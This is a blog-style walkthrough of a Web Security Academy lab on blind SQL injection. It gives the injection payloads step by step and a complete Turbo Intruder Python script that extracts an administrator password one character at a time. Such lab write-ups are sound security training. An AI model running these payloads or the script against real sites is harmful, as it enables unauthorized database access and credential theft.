booker
4 min read · Mar 25, 2022


Reducing your brute-force attack time with Turbo Intruder

Prerequisites: SQL, Burp Suite

PortSwigger's Web Security Academy has good quality web security courses and exercises. One of the exercises about SQL injection is "Blind SQL injection with conditional responses" (link here). In this post, I will share my experience of how I reduced the time required to brute-force a password from 3 hours to 2 minutes using the Turbo Intruder extension for Burp Suite.

Let's start with an exercise description:

The exercise asks us to perform a blind SQL injection against the website. A blind SQL injection is one where the application does not return the query's results or its error messages to us; all we can observe is a side effect of the query, such as a change in the page that depends on whether our injected condition evaluated to true or false.

The page changes based on whether the tracking id sent in the cookie has been seen before: if the TrackingId cookie matches a stored value, the page shows a "Welcome back" message; otherwise it does not. That difference is the only signal we get from the database.

The exercise explains that the vulnerable parameter is the TrackingId cookie. If we had not known the vulnerable parameter, we would fuzz every parameter that reaches the server (query string, body fields, cookies, headers) and check each one for behaviour that changes with an injected condition.

In this case, we assume the query that looks up the tracking id works like the following (the table and column names are assumed; the lab does not show them):

SELECT tracking_id FROM tracking_table WHERE tracking_id = 'the tracking id in the cookie'

The last part, the quoted cookie value, is the parameter susceptible to SQL injection: the application copies the cookie into the string literal without escaping it.

I finished the exercise using Burp Suite. I used the Proxy, Repeater, and Intruder tools to accomplish it, and then improved the brute-force using the Turbo Intruder extension.

Step 1) Check whether the parameter is vulnerable to SQL injection.

We use two payloads, each appended to the existing TrackingId cookie value:

' AND 1=1-- This should return the "Welcome back" message.

' AND 1=2-- This should not return the "Welcome back" message.

The final SQL query after injecting the first payload will be:

SELECT tracking_id FROM tracking_table WHERE tracking_id='tracking-id' AND 1=1-- '

Note that the comment sequence is two dashes with nothing between them; it comments out the application's trailing quote so the query stays syntactically valid. The vulnerability is confirmed not by either response on its own but by the difference between them: in the screenshot, the left side (1=1) has a positive response and the right side (1=2) has a negative response.

Step 2) Confirm that a users table exists.

The payload used is as follows:

' AND (SELECT 'x' FROM users LIMIT 1)='x'--

This makes the overall SQL query:

SELECT tracking_id FROM tracking_table WHERE tracking_id='tracking-cookie' AND (SELECT 'x' FROM users LIMIT 1)='x'-- '

If the users table exists, the subquery returns 'x', the condition is true and the welcome message appears. If the table does not exist, the query fails and the message is absent.

Step 3) Since we know the user administrator exists, let's try to figure out the length of the password. Here we use Intruder. The payload will be:

' AND (SELECT username FROM users WHERE username='administrator' AND LENGTH(password)>$length_variable)='administrator'--

This results in the following query:

SELECT tracking_id FROM tracking_table WHERE tracking_id='tracking_cookie' AND (SELECT username FROM users WHERE username='administrator' AND LENGTH(password)>$length_variable)='administrator'-- '

The subquery returns 'administrator' only while the password is longer than $length_variable, so the response stays positive up to the password length and turns negative at it. The first value of $length_variable for which the response is negative is the password length: if the condition holds for 19 but not for 20, the password is exactly 20 characters long.

The § markers in Intruder mark the payload position, which replaces $length_variable.
We are going to use the numbers from 1 to 30 as the payload list.
When the condition becomes false, the length of the response changes, because the "Welcome back" message disappears; sorting the results by response length makes the change easy to spot. In the results this happens at 20, which means the password is 20 characters long.

Step 4) Determining the password. We will do this in two ways: first with the built-in Intruder, then with Turbo Intruder. The payload will be:

' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a'--

Resulting in the following query:

SELECT tracking_id FROM tracking_table WHERE tracking_id='tracking_cookie' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a'-- '

In Intruder we mark two payload positions, the offset passed to SUBSTRING and the candidate character, and use a Cluster bomb attack (the mode that pairs every value of one position with every value of the other), so that every offset from 1 to 20 is tested against every candidate character. As shown in the above image, whenever a request gets the positive reply, we have found the correct character for that position.

As given in the above image, the 2nd letter of the password is 'a'. In this way, we can brute-force the whole password.
NB: this method took 3 hours to finish, because Intruder in Burp Suite Community Edition is rate-limited.

Now, instead of sending the request to the built-in Intruder, we send it to Turbo Intruder, installed from the BApp Store via the Extender tool. Turbo Intruder's main advantage is that the attack is written as a small Python script, so the requests can be generated from loops and sent over a few fast connections instead of one at a time.

After sending the request to Turbo Intruder, we mark the positions where we want to insert our payloads with '%s' (two of them here: the SUBSTRING offset and the candidate character).

Two nested for-loops generate the payloads for the two positions. Running this gave me the result in 2 minutes.
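The Turbo Intruder script for Step 4, as an added example; it is not the post's own script (which is only visible in the screenshot), and it assumes the following: the request handed to Turbo Intruder has its TrackingId cookie edited to `TrackingId=xyz' AND (SELECT SUBSTRING(password,%s,1) FROM users WHERE username='administrator')='%s'--`, the password is 20 characters drawn from lowercase letters and digits (the length from Step 3 plus the lab's character set), and a true condition puts the string "Welcome back" in the response body. RequestEngine and table are names Turbo Intruder injects into every script; they are only referenced inside the two callbacks, so the helper functions also run outside Burp (Turbo Intruder runs Jython 2.7, hence the Python 2 compatible syntax).

```python
# Turbo Intruder script: recover the administrator password one character
# at a time from a boolean (conditional-response) blind SQL injection.
# Assumed request template (edited in Turbo Intruder before running):
#   Cookie: TrackingId=xyz' AND (SELECT SUBSTRING(password,%s,1) FROM users
#           WHERE username='administrator')='%s'--
# The two %s markers are filled, in order, with the offset and the candidate
# character of each queued request.
import string

PASSWORD_LENGTH = 20                      # assumed: result of the length probe
CHARSET = string.ascii_lowercase + string.digits  # assumed: lab's character set
MARKER = 'Welcome back'                   # assumed: present only for true conditions


def make_label(position, char):
    """Label each queued request so a hit can be mapped back to its position."""
    return '%d:%s' % (position, char)


def record_hit(label, body, found):
    """If the response body carries the marker, store the character for the
    position encoded in the label. Returns True when the request was a hit."""
    if MARKER not in body:
        return False
    position, char = label.split(':', 1)
    found[int(position)] = char
    return True


def assemble(found, length=PASSWORD_LENGTH):
    """Join the recovered characters in order; '?' marks positions not yet hit."""
    return ''.join(found.get(i, '?') for i in range(1, length + 1))


def queueRequests(target, wordlists):
    # One request per (position, candidate): 20 * 36 = 720 requests, spread
    # over a few concurrent connections instead of sent one at a time.
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False)
    for position in range(1, PASSWORD_LENGTH + 1):
        for char in CHARSET:
            # A list fills the %s markers in order: offset first, then character.
            engine.queue(target.req, [str(position), char],
                         label=make_label(position, char))


found = {}


def handleResponse(req, interesting):
    # Only true conditions carry the marker; everything else is dropped.
    if record_hit(req.label, req.response, found):
        table.add(req)
        if len(found) == PASSWORD_LENGTH:
            print('administrator password: %s' % assemble(found))
```

Only the hits reach the results table, and the assembled password is printed to Turbo Intruder's output pane once all 20 positions have a hit. The check is on the body marker rather than on `req.length`, so an unrelated change in response size does not produce a false positive. One caveat: on databases that compare strings case-insensitively, `='a'` would also match `'A'`; that does not matter for the lab's lowercase-and-digit passwords, but against a real target the character set and the comparison's collation need to be checked.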
